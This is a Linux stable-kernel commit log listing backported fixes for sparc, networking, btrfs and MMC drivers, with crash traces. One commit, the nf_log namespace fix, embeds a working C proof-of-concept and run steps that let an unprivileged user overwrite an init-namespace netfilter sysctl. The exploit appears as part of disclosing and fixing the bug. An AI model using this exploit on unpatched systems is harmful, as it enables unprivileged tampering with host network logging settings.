- 21 Nov, 2016 36 commits
-
-
David S. Miller authored
[ Upstream commit 614da3d9 ] All of __ret{,l}_mone{_asi,_fp,_asi_fpu} are now unused. Signed-off-by: David S. Miller <davem@davemloft.net> Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
-
David S. Miller authored
[ Upstream commit ee841d0a ] Report the exact number of bytes which have not been successfully copied when an exception occurs, using the running remaining length. Signed-off-by: David S. Miller <davem@davemloft.net> Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
-
David S. Miller authored
[ Upstream commit e93704e4 ] Report the exact number of bytes which have not been successfully copied when an exception occurs, using the running remaining length. Signed-off-by: David S. Miller <davem@davemloft.net> Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
-
David S. Miller authored
[ Upstream commit 7ae3aaf5 ] Report the exact number of bytes which have not been successfully copied when an exception occurs, using the running remaining length. Signed-off-by: David S. Miller <davem@davemloft.net> Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
-
David S. Miller authored
[ Upstream commit 95707704 ] Report the exact number of bytes which have not been successfully copied when an exception occurs, using the running remaining length. Signed-off-by: David S. Miller <davem@davemloft.net> Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
-
David S. Miller authored
[ Upstream commit cb736fdb ] Report the exact number of bytes which have not been successfully copied when an exception occurs, using the running remaining length. Signed-off-by: David S. Miller <davem@davemloft.net> Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
-
David S. Miller authored
[ Upstream commit d0796b55 ] Report the exact number of bytes which have not been successfully copied when an exception occurs, using the running remaining length. Signed-off-by: David S. Miller <davem@davemloft.net> Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
-
David S. Miller authored
[ Upstream commit 0096ac9f ] Report the exact number of bytes which have not been successfully copied when an exception occurs, using the running remaining length. Signed-off-by: David S. Miller <davem@davemloft.net> Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
-
David S. Miller authored
[ Upstream commit 83a17d26 ] The fixup helper function mechanism for handling user copy fault handling is not %100 accurrate, and can never be made so. We are going to transition the code to return the running return return length, which is always kept track in one or more registers of each of these routines. In order to convert them one by one, we have to allow the existing behavior to continue functioning. Therefore make all the copy code that wants the fixup helper to be used return negative one. After all of the user copy routines have been converted, this logic and the fixup helpers themselves can be removed completely. Signed-off-by: David S. Miller <davem@davemloft.net> Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
-
David S. Miller authored
[ Upstream commit aa95ce36 ] It is completely unused. Signed-off-by: David S. Miller <davem@davemloft.net> Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
-
David S. Miller authored
[ Upstream commit a74ad5e6 ] When the vmalloc area gets fragmented, and because the firmware mapping area sits between where modules live and the vmalloc area, we can sometimes receive requests for enormous kernel TLB range flushes. When this happens the cpu just spins flushing billions of pages and this triggers the NMI watchdog and other problems. We took care of this on the TSB side by doing a linear scan of the table once we pass a certain threshold. Do something similar for the TLB flush, however we are limited by the TLB flush facilities provided by the different chip variants. First of all we use an (mostly arbitrary) cut-off of 256K which is about 32 pages. This can be tuned in the future. The huge range code path for each chip works as follows: 1) On spitfire we flush all non-locked TLB entries using diagnostic acceses. 2) On cheetah we use the "flush all" TLB flush. 3) On sun4v/hypervisor we do a TLB context flush on context 0, which unlike previous chips does not remove "permanent" or locked entries. We could probably do something better on spitfire, such as limiting the flush to kernel TLB entries or even doing range comparisons. However that probably isn't worth it since those chips are old and the TLB only had 64 entries. Reported-by: James Clarke <jrtc27@jrtc27.com> Tested-by: James Clarke <jrtc27@jrtc27.com> Signed-off-by: David S. Miller <davem@davemloft.net> Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
-
David S. Miller authored
[ Upstream commit a236441b ] Just like the non-cross-call TLB flush handlers, the cross-call ones need to avoid doing PC-relative branches outside of their code blocks. Signed-off-by: David S. Miller <davem@davemloft.net> Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
-
David S. Miller authored
[ Upstream commit 830cda3f ] Noticed by James Clarke. Signed-off-by: David S. Miller <davem@davemloft.net> Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
-
David S. Miller authored
[ Upstream commit b429ae4d ] When we copy code over to patch another piece of code, we can only use PC-relative branches that target code within that piece of code. Such PC-relative branches cannot be made to external symbols because the patch moves the location of the code and thus modifies the relative address of external symbols. Use an absolute jmpl to fix this problem. Signed-off-by: David S. Miller <davem@davemloft.net> Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
-
David S. Miller authored
[ Upstream commit 849c4987 ] If the number of pages we are flushing is more than twice the number of entries in the TSB, just scan the TSB table for matches rather than probing each and every page in the range. Based upon a patch and report by James Clarke. Signed-off-by: David S. Miller <davem@davemloft.net> Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
-
James Clarke authored
[ Upstream commit 9d9fa230 ] Additionally, if the offset will overflow the immediate for a ba,pt instruction, fall back on a standard ba to get an extra 3 bits. Signed-off-by: James Clarke <jrtc27@jrtc27.com> Signed-off-by: David S. Miller <davem@davemloft.net> Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
-
Mike Kravetz authored
[ Upstream commit af1b1a9b ] do_sparc64_fault() calculates both the base and huge page RSS sizes and uses this information in calls to tsb_grow(). The calculation for base page TSB size is not correct if the task uses hugetlb pages. hugetlb pages are not accounted for in RSS, therefore the call to get_mm_rss(mm) does not include hugetlb pages. However, the number of pages based on huge_pte_count (which does include hugetlb pages) is subtracted from this value. This will result in an artificially small and often negative RSS calculation. The base TSB size is then often set to max_tsb_size as the passed RSS is unsigned, so a negative value looks really big. THP pages are also accounted for in huge_pte_count, and THP pages are accounted for in RSS so the calculation in do_sparc64_fault() is correct if a task only uses THP pages. A single huge_pte_count is not sufficient for TSB sizing if both hugetlb and THP pages can be used. Instead of a single counter, use two: one for hugetlb and one for THP. Signed-off-by: Mike Kravetz <mike.kravetz@oracle.com> Signed-off-by: David S. Miller <davem@davemloft.net> Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
-
Dan Carpenter authored
[ Upstream commit 344e3c77 ] We accidentally take the "port->lock" twice in a row. This old code was supposed to be deleted. Fixes: e58e241c ('sparc: serial: Clean up the locking for -rt') Signed-off-by: Dan Carpenter <dan.carpenter@oracle.com> Signed-off-by: David S. Miller <davem@davemloft.net> Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
-
David S. Miller authored
[ Upstream commit 4f6deb8c ] On pre-Niagara systems, we fetch the fault address on data TLB exceptions from the TLB_TAG_ACCESS register. But this register also contains the context ID assosciated with the fault in the low 13 bits of the register value. This propagates into current_thread_info()->fault_address and can cause trouble later on. So clear the low 13-bits out of the TLB_TAG_ACCESS value in the cases where it matters. Reported-by: Mikulas Patocka <mpatocka@redhat.com> Signed-off-by: David S. Miller <davem@davemloft.net> Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
-
Peter Hurley authored
commit dd42bf11 upstream. Line discipline drivers may mistakenly misuse ldisc-related fields when initializing. For example, a failure to initialize tty->receive_room in the N_GIGASET_M101 line discipline was recently found and fixed [1]. Now, the N_X25 line discipline has been discovered accessing the previous line discipline's already-freed private data [2]. Harden the ldisc interface against misuse by initializing revelant tty fields before instancing the new line discipline. [1] commit fd98e941 Author: Tilman Schmidt <tilman@imap.cc> Date: Tue Jul 14 00:37:13 2015 +0200 isdn/gigaset: reset tty->receive_room when attaching ser_gigaset [2] Report from Sasha Levin <sasha.levin@oracle.com> [ 634.336761] ================================================================== [ 634.338226] BUG: KASAN: use-after-free in x25_asy_open_tty+0x13d/0x490 at addr ffff8800a743efd0 [ 634.339558] Read of size 4 by task syzkaller_execu/8981 [ 634.340359] ============================================================================= [ 634.341598] BUG kmalloc-512 (Not tainted): kasan: bad access detected ... [ 634.405018] Call Trace: [ 634.405277] dump_stack (lib/dump_stack.c:52) [ 634.405775] print_trailer (mm/slub.c:655) [ 634.406361] object_err (mm/slub.c:662) [ 634.406824] kasan_report_error (mm/kasan/report.c:138 mm/kasan/report.c:236) [ 634.409581] __asan_report_load4_noabort (mm/kasan/report.c:279) [ 634.411355] x25_asy_open_tty (drivers/net/wan/x25_asy.c:559 (discriminator 1)) [ 634.413997] tty_ldisc_open.isra.2 (drivers/tty/tty_ldisc.c:447) [ 634.414549] tty_set_ldisc (drivers/tty/tty_ldisc.c:567) [ 634.415057] tty_ioctl (drivers/tty/tty_io.c:2646 drivers/tty/tty_io.c:2879) [ 634.423524] do_vfs_ioctl (fs/ioctl.c:43 fs/ioctl.c:607) [ 634.427491] SyS_ioctl (fs/ioctl.c:622 fs/ioctl.c:613) [ 634.427945] entry_SYSCALL_64_fastpath (arch/x86/entry/entry_64.S:188) Cc: Tilman Schmidt <tilman@imap.cc> Cc: Sasha Levin <sasha.levin@oracle.com> Signed-off-by: Peter Hurley <peter@hurleysoftware.com> Cc: Jiri Slaby <jslaby@suse.cz> Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
-
Eric Dumazet authored
[ Upstream commit ac6e7800 ] With syzkaller help, Marco Grassi found a bug in TCP stack, crashing in tcp_collapse() Root cause is that sk_filter() can truncate the incoming skb, but TCP stack was not really expecting this to happen. It probably was expecting a simple DROP or ACCEPT behavior. We first need to make sure no part of TCP header could be removed. Then we need to adjust TCP_SKB_CB(skb)->end_seq Many thanks to syzkaller team and Marco for giving us a reproducer. Signed-off-by: Eric Dumazet <edumazet@google.com> Reported-by: Marco Grassi <marco.gra@gmail.com> Reported-by: Vladis Dronov <vdronov@redhat.com> Signed-off-by: David S. Miller <davem@davemloft.net> Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
-
Stephen Suryaputra Lin authored
[ Upstream commit 969447f2 ] In v2.6, ip_rt_redirect() calls arp_bind_neighbour() which returns 0 and then the state of the neigh for the new_gw is checked. If the state isn't valid then the redirected route is deleted. This behavior is maintained up to v3.5.7 by check_peer_redirect() because rt->rt_gateway is assigned to peer->redirect_learned.a4 before calling ipv4_neigh_lookup(). After commit 5943634f ("ipv4: Maintain redirect and PMTU info in struct rtable again."), ipv4_neigh_lookup() is performed without the rt_gateway assigned to the new_gw. In the case when rt_gateway (old_gw) isn't zero, the function uses it as the key. The neigh is most likely valid since the old_gw is the one that sends the ICMP redirect message. Then the new_gw is assigned to fib_nh_exception. The problem is: the new_gw ARP may never gets resolved and the traffic is blackholed. So, use the new_gw for neigh lookup. Changes from v1: - use __ipv4_neigh_lookup instead (per Eric Dumazet). Fixes: 5943634f ("ipv4: Maintain redirect and PMTU info in struct rtable again.") Signed-off-by: Stephen Suryaputra Lin <ssurya@ieee.org> Signed-off-by: David S. Miller <davem@davemloft.net> Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
-
Eric Dumazet authored
[ Upstream commit 34fad54c ] After Tom patch, thoff field could point past the end of the buffer, this could fool some callers. If an skb was provided, skb->len should be the upper limit. If not, hlen is supposed to be the upper limit. Fixes: a6e544b0 ("flow_dissector: Jump to exit code in __skb_flow_dissect") Signed-off-by: Eric Dumazet <edumazet@google.com> Reported-by: Yibin Yang <yibyang@cisco.com Acked-by: Alexander Duyck <alexander.h.duyck@intel.com> Acked-by: Willem de Bruijn <willemb@google.com> Acked-by: Alexei Starovoitov <ast@kernel.org> Signed-off-by: David S. Miller <davem@davemloft.net> Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
-
Soheil Hassas Yeganeh authored
[ Upstream commit 3023898b ] Do not send the next message in sendmmsg for partial sendmsg invocations. sendmmsg assumes that it can continue sending the next message when the return value of the individual sendmsg invocations is positive. It results in corrupting the data for TCP, SCTP, and UNIX streams. For example, sendmmsg([["abcd"], ["efgh"]]) can result in a stream of "aefgh" if the first sendmsg invocation sends only the first byte while the second sendmsg goes through. Datagram sockets either send the entire datagram or fail, so this patch affects only sockets of type SOCK_STREAM and SOCK_SEQPACKET. Fixes: 228e548e ("net: Add sendmmsg socket system call") Signed-off-by: Soheil Hassas Yeganeh <soheil@google.com> Signed-off-by: Eric Dumazet <edumazet@google.com> Signed-off-by: Willem de Bruijn <willemb@google.com> Signed-off-by: Neal Cardwell <ncardwell@google.com> Acked-by: Maciej Żenczykowski <maze@google.com> Signed-off-by: David S. Miller <davem@davemloft.net> Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
-
Alexander Duyck authored
[ Upstream commit fd0285a3 ] The display of /proc/net/route has had a couple issues due to the fact that when I originally rewrote most of fib_trie I made it so that the iterator was tracking the next value to use instead of the current. In addition it had an off by 1 error where I was tracking the first piece of data as position 0, even though in reality that belonged to the SEQ_START_TOKEN. This patch updates the code so the iterator tracks the last reported position and key instead of the next expected position and key. In addition it shifts things so that all of the leaves start at 1 instead of trying to report leaves starting with offset 0 as being valid. With these two issues addressed this should resolve any off by one errors that were present in the display of /proc/net/route. Fixes: 25b97c01 ("ipv4: off-by-one in continuation handling in /proc/net/route") Cc: Andy Whitcroft <apw@canonical.com> Reported-by: Jason Baron <jbaron@akamai.com> Tested-by: Jason Baron <jbaron@akamai.com> Signed-off-by: Alexander Duyck <alexander.h.duyck@intel.com> Signed-off-by: David S. Miller <davem@davemloft.net> Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
-
Marcelo Ricardo Leitner authored
[ Upstream commit 7233bc84 ] sctp_wait_for_connect() currently already holds the asoc to keep it alive during the sleep, in case another thread release it. But Andrey Konovalov and Dmitry Vyukov reported an use-after-free in such situation. Problem is that __sctp_connect() doesn't get a ref on the asoc and will do a read on the asoc after calling sctp_wait_for_connect(), but by then another thread may have closed it and the _put on sctp_wait_for_connect will actually release it, causing the use-after-free. Fix is, instead of doing the read after waiting for the connect, do it before so, and avoid this issue as the socket is still locked by then. There should be no issue on returning the asoc id in case of failure as the application shouldn't trust on that number in such situations anyway. This issue doesn't exist in sctp_sendmsg() path. Reported-by: Dmitry Vyukov <dvyukov@google.com> Reported-by: Andrey Konovalov <andreyknvl@google.com> Tested-by: Andrey Konovalov <andreyknvl@google.com> Signed-off-by: Marcelo Ricardo Leitner <marcelo.leitner@gmail.com> Reviewed-by: Xin Long <lucien.xin@gmail.com> Acked-by: Neil Horman <nhorman@tuxdriver.com> Signed-off-by: David S. Miller <davem@davemloft.net> Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
-
Eric Dumazet authored
[ Upstream commit 990ff4d8 ] While fuzzing kernel with syzkaller, Andrey reported a nasty crash in inet6_bind() caused by DCCP lacking a required method. Fixes: ab1e0a13 ("[SOCK] proto: Add hashinfo member to struct proto") Signed-off-by: Eric Dumazet <edumazet@google.com> Reported-by: Andrey Konovalov <andreyknvl@google.com> Tested-by: Andrey Konovalov <andreyknvl@google.com> Cc: Arnaldo Carvalho de Melo <acme@redhat.com> Acked-by: Arnaldo Carvalho de Melo <acme@redhat.com> Signed-off-by: David S. Miller <davem@davemloft.net> Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
-
Eric Dumazet authored
[ Upstream commit 1aa9d1a0 ] dccp_v6_err() does not use pskb_may_pull() and might access garbage. We only need 4 bytes at the beginning of the DCCP header, like TCP, so the 8 bytes pulled in icmpv6_notify() are more than enough. Signed-off-by: Eric Dumazet <edumazet@google.com> Signed-off-by: David S. Miller <davem@davemloft.net> Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
-
Eric Dumazet authored
[ Upstream commit 6706a97f ] dccp_v4_err() does not use pskb_may_pull() and might access garbage. We only need 4 bytes at the beginning of the DCCP header, like TCP, so the 8 bytes pulled in icmp_socket_deliver() are more than enough. This patch might allow to process more ICMP messages, as some routers are still limiting the size of reflected bytes to 28 (RFC 792), instead of extended lengths (RFC 1812 4.3.2.3) Signed-off-by: Eric Dumazet <edumazet@google.com> Signed-off-by: David S. Miller <davem@davemloft.net> Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
-
Eric Dumazet authored
[ Upstream commit 346da62c ] Andrey reported following warning while fuzzing with syzkaller WARNING: CPU: 1 PID: 21072 at net/dccp/proto.c:83 dccp_set_state+0x229/0x290 Kernel panic - not syncing: panic_on_warn set ... CPU: 1 PID: 21072 Comm: syz-executor Not tainted 4.9.0-rc1+ #293 Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Bochs 01/01/2011 ffff88003d4c7738 ffffffff81b474f4 0000000000000003 dffffc0000000000 ffffffff844f8b00 ffff88003d4c7804 ffff88003d4c7800 ffffffff8140c06a 0000000041b58ab3 ffffffff8479ab7d ffffffff8140beae ffffffff8140cd00 Call Trace: [< inline >] __dump_stack lib/dump_stack.c:15 [<ffffffff81b474f4>] dump_stack+0xb3/0x10f lib/dump_stack.c:51 [<ffffffff8140c06a>] panic+0x1bc/0x39d kernel/panic.c:179 [<ffffffff8111125c>] __warn+0x1cc/0x1f0 kernel/panic.c:542 [<ffffffff8111144c>] warn_slowpath_null+0x2c/0x40 kernel/panic.c:585 [<ffffffff8389e5d9>] dccp_set_state+0x229/0x290 net/dccp/proto.c:83 [<ffffffff838a0aa2>] dccp_close+0x612/0xc10 net/dccp/proto.c:1016 [<ffffffff8316bf1f>] inet_release+0xef/0x1c0 net/ipv4/af_inet.c:415 [<ffffffff82b6e89e>] sock_release+0x8e/0x1d0 net/socket.c:570 [<ffffffff82b6e9f6>] sock_close+0x16/0x20 net/socket.c:1017 [<ffffffff815256ad>] __fput+0x29d/0x720 fs/file_table.c:208 [<ffffffff81525bb5>] ____fput+0x15/0x20 fs/file_table.c:244 [<ffffffff811727d8>] task_work_run+0xf8/0x170 kernel/task_work.c:116 [< inline >] exit_task_work include/linux/task_work.h:21 [<ffffffff8111bc53>] do_exit+0x883/0x2ac0 kernel/exit.c:828 [<ffffffff811221fe>] do_group_exit+0x10e/0x340 kernel/exit.c:931 [<ffffffff81143c94>] get_signal+0x634/0x15a0 kernel/signal.c:2307 [<ffffffff81054aad>] do_signal+0x8d/0x1a30 arch/x86/kernel/signal.c:807 [<ffffffff81003a05>] exit_to_usermode_loop+0xe5/0x130 arch/x86/entry/common.c:156 [< inline >] prepare_exit_to_usermode arch/x86/entry/common.c:190 [<ffffffff81006298>] syscall_return_slowpath+0x1a8/0x1e0 arch/x86/entry/common.c:259 [<ffffffff83fc1a62>] entry_SYSCALL_64_fastpath+0xc0/0xc2 Dumping ftrace buffer: (ftrace buffer empty) Kernel Offset: disabled Fix this the same way we did for TCP in commit 565b7b2d ("tcp: do not send reset to already closed sockets") Signed-off-by: Eric Dumazet <edumazet@google.com> Reported-by: Andrey Konovalov <andreyknvl@google.com> Tested-by: Andrey Konovalov <andreyknvl@google.com> Signed-off-by: David S. Miller <davem@davemloft.net> Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
-
Eric Dumazet authored
[ Upstream commit ac9e70b1 ] Imagine initial value of max_skb_frags is 17, and last skb in write queue has 15 frags. Then max_skb_frags is lowered to 14 or smaller value. tcp_sendmsg() will then be allowed to add additional page frags and eventually go past MAX_SKB_FRAGS, overflowing struct skb_shared_info. Fixes: 5f74f82e ("net:Add sysctl_max_skb_frags") Signed-off-by: Eric Dumazet <edumazet@google.com> Cc: Hans Westgaard Ry <hans.westgaard.ry@oracle.com> Cc: Håkon Bugge <haakon.bugge@oracle.com> Signed-off-by: David S. Miller <davem@davemloft.net> Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
-
Eli Cooper authored
[ Upstream commit 23f4ffed ] skb->cb may contain data from previous layers. In the observed scenario, the garbage data were misinterpreted as IP6CB(skb)->frag_max_size, so that small packets sent through the tunnel are mistakenly fragmented. This patch unconditionally clears the control buffer in ip6tunnel_xmit(), which affects ip6_tunnel, ip6_udp_tunnel and ip6_gre. Currently none of these tunnels set IP6CB(skb)->flags, otherwise it needs to be done earlier. Cc: stable@vger.kernel.org Signed-off-by: Eli Cooper <elicooper@gmx.com> Signed-off-by: David S. Miller <davem@davemloft.net> Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
-
Andy Gospodarek authored
[ Upstream commit fcdefcca ] Current bgmac code initializes some DMA settings in the receive control register for some hardware and then immediately clears those settings. Not clearing those settings results in ~420Mbps *improvement* in throughput; this system can now receive frames at line-rate on Broadcom 5871x hardware compared to ~520Mbps today. I also tested a few other values but found there to be no discernible difference in CPU utilization even if burst size and prefetching values are different. On the hardware tested there was no need to keep the code that cleared all but bits 16-17, but since there is a wide variety of hardware that used this driver (I did not look at all hardware docs for hardware using this IP block), I find it wise to move this call up and clear bits just after reading the default value from the hardware rather than completely removing it. This is a good candidate for -stable >=3.14 since that is when the code that was supposed to improve performance (but did not) was introduced. Signed-off-by: Andy Gospodarek <gospo@broadcom.com> Fixes: 56ceecde ("bgmac: initialize the DMA controller of core...") Cc: Hauke Mehrtens <hauke@hauke-m.de> Acked-by: Hauke Mehrtens <hauke@hauke-m.de> Signed-off-by: David S. Miller <davem@davemloft.net> Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
-
Eric Dumazet authored
[ Upstream commit 4f2e4ad5 ] Sending zero checksum is ok for TCP, but not for UDP. UDPv6 receiver should by default drop a frame with a 0 checksum, and UDPv4 would not verify the checksum and might accept a corrupted packet. Simply replace such checksum by 0xffff, regardless of transport. This error was caught on SIT tunnels, but seems generic. Signed-off-by: Eric Dumazet <edumazet@google.com> Cc: Maciej Żenczykowski <maze@google.com> Cc: Willem de Bruijn <willemb@google.com> Acked-by: Maciej Żenczykowski <maze@google.com> Signed-off-by: David S. Miller <davem@davemloft.net> Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
-
Eric Dumazet authored
[ Upstream commit e551c32d ] At accept() time, it is possible the parent has a non zero sk_err_soft, leftover from a prior error. Make sure we do not leave this value in the child, as it makes future getsockopt(SO_ERROR) calls quite unreliable. Signed-off-by: Eric Dumazet <edumazet@google.com> Acked-by: Soheil Hassas Yeganeh <soheil@google.com> Signed-off-by: David S. Miller <davem@davemloft.net> Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
-
Florian Westphal authored
[ Upstream commit ce6dd233 ] If a congestion control module doesn't provide .undo_cwnd function, tcp_undo_cwnd_reduction() will set cwnd to tp->snd_cwnd = max(tp->snd_cwnd, tp->snd_ssthresh << 1); ... which makes sense for reno (it sets ssthresh to half the current cwnd), but it makes no sense for dctcp, which sets ssthresh based on the current congestion estimate. This can cause severe growth of cwnd (eventually overflowing u32). Fix this by saving last cwnd on loss and restore cwnd based on that, similar to cubic and other algorithms. Fixes: e3118e83 ("net: tcp: add DCTCP congestion control algorithm") Cc: Lawrence Brakmo <brakmo@fb.com> Cc: Andrew Shewmaker <agshew@gmail.com> Cc: Glenn Judd <glenn.judd@morganstanley.com> Acked-by: Daniel Borkmann <daniel@iogearbox.net> Signed-off-by: Florian Westphal <fw@strlen.de> Signed-off-by: David S. Miller <davem@davemloft.net> Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
-
- 18 Nov, 2016 4 commits
-
-
Greg Kroah-Hartman authored
-
Jann Horn authored
commit dbb5918c upstream. nf_log_proc_dostring() used current's network namespace instead of the one corresponding to the sysctl file the write was performed on. Because the permission check happens at open time and the nf_log files in namespaces are accessible for the namespace owner, this can be abused by an unprivileged user to effectively write to the init namespace's nf_log sysctls. Stash the "struct net *" in extra2 - data and extra1 are already used. Repro code: #define _GNU_SOURCE #include <stdlib.h> #include <sched.h> #include <err.h> #include <sys/mount.h> #include <sys/types.h> #include <sys/wait.h> #include <fcntl.h> #include <unistd.h> #include <string.h> #include <stdio.h> char child_stack[1000000]; uid_t outer_uid; gid_t outer_gid; int stolen_fd = -1; void writefile(char *path, char *buf) { int fd = open(path, O_WRONLY); if (fd == -1) err(1, "unable to open thing"); if (write(fd, buf, strlen(buf)) != strlen(buf)) err(1, "unable to write thing"); close(fd); } int child_fn(void *p_) { if (mount("proc", "/proc", "proc", MS_NOSUID|MS_NODEV|MS_NOEXEC, NULL)) err(1, "mount"); /* Yes, we need to set the maps for the net sysctls to recognize us * as namespace root. */ char buf[1000]; sprintf(buf, "0 %d 1\n", (int)outer_uid); writefile("/proc/1/uid_map", buf); writefile("/proc/1/setgroups", "deny"); sprintf(buf, "0 %d 1\n", (int)outer_gid); writefile("/proc/1/gid_map", buf); stolen_fd = open("/proc/sys/net/netfilter/nf_log/2", O_WRONLY); if (stolen_fd == -1) err(1, "open nf_log"); return 0; } int main(void) { outer_uid = getuid(); outer_gid = getgid(); int child = clone(child_fn, child_stack + sizeof(child_stack), CLONE_FILES|CLONE_NEWNET|CLONE_NEWNS|CLONE_NEWPID |CLONE_NEWUSER|CLONE_VM|SIGCHLD, NULL); if (child == -1) err(1, "clone"); int status; if (wait(&status) != child) err(1, "wait"); if (!WIFEXITED(status) || WEXITSTATUS(status) != 0) errx(1, "child exit status bad"); char *data = "NONE"; if (write(stolen_fd, data, strlen(data)) != strlen(data)) err(1, "write"); return 0; } Repro: $ gcc -Wall -o attack attack.c -std=gnu99 $ cat /proc/sys/net/netfilter/nf_log/2 nf_log_ipv4 $ ./attack $ cat /proc/sys/net/netfilter/nf_log/2 NONE Because this looks like an issue with very low severity, I'm sending it to the public list directly. Signed-off-by: Jann Horn <jann@thejh.net> Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org> Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
-
Goldwyn Rodrigues authored
commit 0b34c261 upstream. While free'ing qgroup->reserved resources, we much check if the page has not been invalidated by a truncate operation by checking if the page is still dirty before reducing the qgroup resources. Resources in such a case are free'd when the entire extent is released by delayed_ref. This fixes a double accounting while releasing resources in case of truncating a file, reproduced by the following testcase. SCRATCH_DEV=/dev/vdb SCRATCH_MNT=/mnt mkfs.btrfs -f $SCRATCH_DEV mount -t btrfs $SCRATCH_DEV $SCRATCH_MNT cd $SCRATCH_MNT btrfs quota enable $SCRATCH_MNT btrfs subvolume create a btrfs qgroup limit 500m a $SCRATCH_MNT sync for c in {1..15}; do dd if=/dev/zero bs=1M count=40 of=$SCRATCH_MNT/a/file; done sleep 10 sync sleep 5 touch $SCRATCH_MNT/a/newfile echo "Removing file" rm $SCRATCH_MNT/a/file Fixes: b9d0b389 ("btrfs: Add handler for invalidate page") Signed-off-by: Goldwyn Rodrigues <rgoldwyn@suse.com> Reviewed-by: Qu Wenruo <quwenruo@cn.fujitsu.com> Signed-off-by: David Sterba <dsterba@suse.com> Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
-
Fabio Estevam authored
commit f91346e8 upstream. An interrupt may occur right after devm_request_irq() is called and prior to the spinlock initialization, leading to a kernel oops, as the interrupt handler uses the spinlock. In order to prevent this problem, move the spinlock initialization prior to requesting the interrupts. Fixes: e4243f13 (mmc: mxs-mmc: add mmc host driver for i.MX23/28) Signed-off-by: Fabio Estevam <fabio.estevam@nxp.com> Reviewed-by: Marek Vasut <marex@denx.de> Signed-off-by: Ulf Hansson <ulf.hansson@linaro.org> Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
-